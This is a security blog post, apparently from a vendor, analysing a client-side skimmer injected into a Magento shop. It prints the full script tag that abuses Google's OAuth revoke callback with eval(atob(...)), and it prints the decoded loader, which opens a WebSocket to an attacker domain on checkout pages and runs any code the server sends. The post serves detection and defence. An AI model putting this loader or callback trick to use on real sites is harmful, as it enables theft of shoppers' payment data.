We analyzed a particularly clever client-side attack on a Magento-based eCommerce website parts[.]expert. While not a high-traffic domain, the injection technique used here deserves attention, because it hides in plain sight.
The attacker is using ‘Google.com’ to deliver and execute their own code.
What We Found
Our system flagged a script from an unexpected URL:
<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>
At first glance, it looks like a legitimate OAuth logout URL accounts.google.com/o/oauth2/revoke. But looking closer, the callback parameter is weaponized to run an obfuscated JavaScript payload via eval(atob(...)).
Step-by-Step Breakdown
The base64-encoded payload embedded in the callback decodes into another obfuscated script, which dynamically creates a malicious WebSocket connection to an attacker-controlled domain. Decoded, it reads:
(function() {
let setupMaliciousWebSocket = () => {
// Connect to attacker's WebSocket server
const ws = new WebSocket("wss:/livechatinc.network/chatpipe/029/");
// Execute any code received from the server
ws.onmessage = (event) => {
const maliciousCode = atob(event.data); // Decode Base64
new Function(maliciousCode).call(event.target); // Execute dynamically
};
};
// Run if:
// 1. The browser is automated (e.g., bots), OR
// 2. The URL contains 'checkout' (e.g., payment page)
if (navigator.webdriver || window.location.href.match('checkout')) {
setupMaliciousWebSocket();
}
})();What The Script Does
- Connects to a Malicious WebSocket Server: If the page contains checkout in the URL. Or, if the browser looks automated, it opens a wss:// connection to livechatinc[.]network/chatpipe/029/. That domain is already flagged as malicious: VirusTotal link
- Receives & Executes Remote Payloads: Any base64-encoded messages sent over the WebSocket get decoded and executed with new Function(...). This gives the attacker full remote execution capabilities inside the user's browser session.
- Timing & Context Aware: The script activates specifically on checkout pages, likely to intercept payment data or inject fraudulent elements in real time.
Why It Matters
- Looks Legit: It seems to load from a Google domain so most security tools would trust it blindly. A CSP will not be able to catch this attack, as the trusted Google.com domain will go through. A DNS filter on a user’s device would also not be effective.
- Bypasses Static Scanners: The dangerous logic is nested two layers deep in obfuscation and only executes under specific conditions.
- Real-Time Control: WebSocket-based payloads let attackers push dynamic malicious logic based on user actions.
We’ve seen domain impersonation and obfuscated loaders before, but this combination of OAuth misdirection + conditionally triggered live control goes one step further.
Our product at c/side was able to identify and catch this attack. We receive the full payload of the fetched script and analyze it before it gets sent through to the browser.